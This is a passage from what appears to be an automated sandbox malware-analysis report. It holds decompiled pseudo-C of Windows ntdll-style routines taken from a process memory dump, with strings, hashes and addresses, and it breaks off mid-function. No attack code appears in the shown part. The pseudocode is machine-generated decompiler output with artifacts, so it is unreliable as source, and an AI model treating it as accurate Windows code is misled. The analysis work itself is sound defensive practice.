0x00000000
0x03890692
0x0389069e
0x038906b0
0x038906a0
0x038906a9
0x038906a9
0x038906b8
0x038906d6
0x038906d6
0x00000000

Strings

`, xrefs: 03890633

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: f3303ecd0ef59bdfa47cb5bbf4c7d0e1aba89555f957802b8959b540813a20cc
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: F73103722043496BEB11DFA8CC44F96B799ABC4754F084166F944DF680D770E904C792

Uniqueness

Uniqueness Score: -1.00%

Function 03843884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E03843884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03809650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L037E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03809650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x03843893
0x03843896
0x03843899
0x0384389f
0x038438a0
0x038438a4
0x038438a9
0x038438ac
0x038438ad
0x038438ae
0x038438af
0x038438b1
0x038438b4
0x038438bb
0x038438bc
0x038438bd
0x038438c4
0x038438c8
0x038438ca
0x038438ca
0x038438d5
0x0384393e
0x03843940
0x03843942
0x03843952
0x03843954
0x03843961
0x03843961
0x03843967
0x0384396e
0x0384396e
0x03843947
0x0384394c
0x00000000
0x0384394c
0x038438ea
0x038438ee
0x038438f8
0x038438f9
0x038438ff
0x03843900
0x03843902
0x03843903
0x0384390b
0x0384390f
0x03843950
0x00000000
0x03843950
0x03843915
0x0384391d
0x0384391d
0x03843922
0x03843926
0x00000000
0x03843928
0x0384392b
0x0384392b
0x03843935
0x03843937
0x03843937
0x00000000
0x03843935
0x03843926
0x038438f0
0x00000000

Strings

BinaryName, xrefs: 038438B4

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: 6644b56cb3223eeab4a58e7f2d90f5acae58131f7f0a4e46b9f3c93ac6574ae5
Instruction ID: 00b30b5a5758daff9365ba503e41bc0b453b52589d0da5ce3f8a2007c8209a15
Opcode Fuzzy Hash: 6644b56cb3223eeab4a58e7f2d90f5acae58131f7f0a4e46b9f3c93ac6574ae5
Instruction Fuzzy Hash: AB31F43A90060EBFEB15DA98C945E6FFB78EB81720F0541A9E814EB690D770DE10C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 037FD294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E037FD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x38bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E037E4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0380B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E038098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E038095D0();
					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x037fd29c
0x037fd2a6
0x037fd2b1
0x037fd2b5
0x037fd2b6
0x037fd2bc
0x037fd2bd
0x037fd2be
0x037fd2bf
0x037fd2c2
0x037fd2c4
0x037fd2cc
0x037fd384
0x037fd34b
0x037fd34f
0x037fd350
0x037fd351
0x037fd35c
0x037fd35c
0x037fd2d6
0x037fd2da
0x037fd2e1
0x037fd361
0x037fd369
0x037fd36d
0x037fd2e3
0x037fd2e3
0x037fd2e3
0x037fd2e5
0x037fd2ed
0x037fd2f5
0x037fd2fa
0x037fd302
0x037fd303
0x037fd30b
0x037fd30f
0x037fd313
0x037fd318
0x037fd31c
0x037fd320
0x037fd379
0x037fd37d
0x00000000
0x00000000
0x0383affe
0x0383b001
0x0383b011
0x00000000
0x037fd322
0x037fd322
0x037fd330
0x037fd337
0x037fd35d
0x037fd339
0x037fd33f
0x037fd38c
0x037fd38c
0x037fd33f
0x037fd349
0x00000000
0x037fd349

Strings

@, xrefs: 037FD303

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 80f00c5941826f579dd940faa9b68c2fdbc1448c91da6e9957b413107720357a
Instruction ID: baacb9eb79dbe63809d75e002c507b9ebf8390914fa37b53cfbdeed73e5c4f5a
Opcode Fuzzy Hash: 80f00c5941826f579dd940faa9b68c2fdbc1448c91da6e9957b413107720357a
Instruction Fuzzy Hash: 13317CB6508305EFC721DF68C984A6BBBE8FF89654F04096EFA9487350E634DD04DB92

Uniqueness

Uniqueness Score: -1.00%

Function 037D1B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E037D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0380BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0380A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0380A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L037E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x037d1b8f
0x037d1b9a
0x037d1b9c
0x037d1b9e
0x037d1ba3
0x03827010
0x03827010
0x00000000
0x037d1ba9
0x037d1ba9
0x037d1bae
0x00000000
0x037d1bc5
0x037d1bca
0x037d1bcf
0x037d1bd0
0x037d1bd1
0x037d1bd2
0x037d1bd6
0x037d1bdc
0x037d1be0
0x03826ffc
0x03827000
0x00000000
0x03827006
0x03827009
0x03827009
0x037d1be6
0x037d1bec
0x037d1c0b
0x037d1c0b
0x037d1c0c
0x037d1c11
0x037d1c12
0x037d1c15
0x037d1c1b
0x037d1c1f
0x037d1c31
0x037d1c33
0x03827026
0x03827026
0x037d1c21
0x037d1c24
0x037d1c24
0x037d1bee
0x037d1bee
0x037d1bf2
0x037d1c3a
0x037d1bf4
0x037d1bf4
0x037d1c05
0x037d1c05
0x037d1c09
0x037d1c3e
0x00000000
0x00000000
0x00000000
0x037d1c09
0x037d1bec
0x037d1be0
0x037d1bae
0x037d1c2e

Strings

WindowsExcludedProcs, xrefs: 037D1BC5

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 46956ccca752d5460f918971f30990ca7a615987e89a86664530670274945b67
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 6121D477601228EBCB62DA9AC940F6BBBFDEF45A50F0944A5FD08DB200D634DD00D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 037EF716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x037ef71d
0x037ef722
0x037ef726
0x03834770
0x037ef765
0x037ef769
0x037ef769
0x037ef732
0x0383477a
0x00000000
0x0383477a
0x037ef738
0x037ef73a
0x037ef73c
0x037ef73f
0x037ef746
0x037ef778
0x037ef7a9
0x037ef7a9
0x037ef754
0x037ef75a
0x037ef75d
0x037ef75f
0x037ef761
0x037ef76f
0x037ef771
0x037ef771
0x037ef76f
0x037ef763
0x00000000
0x037ef763
0x037ef77d
0x037ef7a3
0x037ef7a5
0x00000000
0x037ef7a5
0x037ef77f
0x037ef782
0x037ef784
0x037ef786
0x00000000
0x00000000
0x00000000
0x037ef788
0x037ef748
0x037ef74d
0x037ef78d
0x037ef793
0x037ef7b7
0x037ef7bc
0x00000000
0x037ef7bc
0x037ef798
0x00000000
0x00000000
0x037ef79d
0x037ef7b0
0x00000000
0x037ef7b0
0x037ef79f
0x00000000
0x037ef74f
0x037ef74f
0x00000000
0x037ef74f

Strings

Actx , xrefs: 037EF73F

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: e909479ce35a8d8c173abe9a820202905cda3c2c21754c159cc1b56b5b89e052
Instruction ID: 24ca0908e2cb8e64164f0708d1f3bd8332df39fd92f02a184092dfb3cd0c30dd
Opcode Fuzzy Hash: e909479ce35a8d8c173abe9a820202905cda3c2c21754c159cc1b56b5b89e052
Instruction Fuzzy Hash: 9211B6353056028BE724CE1D8490736B29AEB9E624FAB453EE865CBB91D770C840B380

Uniqueness

Uniqueness Score: -1.00%

Function 03878DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E03878DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x38a0d50);
				E0381D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E03855720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0381DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0381DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0381D130(_t34, _t39, _t40);
			}

0x03878df1
0x03878df1
0x03878df1
0x03878df1
0x03878df1
0x03878df1
0x03878df3
0x03878df8
0x03878dfd
0x03878e00
0x03878e0e
0x03878e2a
0x03878e36
0x03878e38
0x03878e3c
0x03878e46
0x03878e46
0x03878e36
0x03878e50
0x03878e56
0x03878e59
0x03878e5c
0x03878e60
0x03878e67
0x03878e6d
0x03878e73
0x03878e74
0x03878eb1
0x03878ebd

Strings

Critical error detected %lx, xrefs: 03878E21

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: da92a458d392bfd0589f088c676941c02f54fa8729634126587e869f0d33885c
Instruction ID: 90c92a627a0bbc08118f25665a1110610f6d8d4df5ad2e84b46987c1a8e56fd8
Opcode Fuzzy Hash: da92a458d392bfd0589f088c676941c02f54fa8729634126587e869f0d33885c
Instruction Fuzzy Hash: 87115BB6D15348EADF24CFE8890A7ECBBB5BB04315F24429DE569AB382C3344605CF16

Uniqueness

Uniqueness Score: -1.00%

Function 0385FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0385FF60

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 1f6484b3c30043c1a0a3b1f7d6161ce66c649ae3013b719adfbb10fe4ea1e949
Instruction ID: 10a394375a46ebd8dd1c55942dfa4b864e51beb0b971ea19d8ebe0219364c6e6
Opcode Fuzzy Hash: 1f6484b3c30043c1a0a3b1f7d6161ce66c649ae3013b719adfbb10fe4ea1e949
Instruction Fuzzy Hash: 66110475510644EFDB12EB94C848F9CB7B1FF09704F1880C4F605EB661CB389954CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03895BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E03895BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x38a1178);
				E0381D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E03894C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0380D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E03895542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x38b60e8;
								if( *0x38b60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x38b60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03809710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03806DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
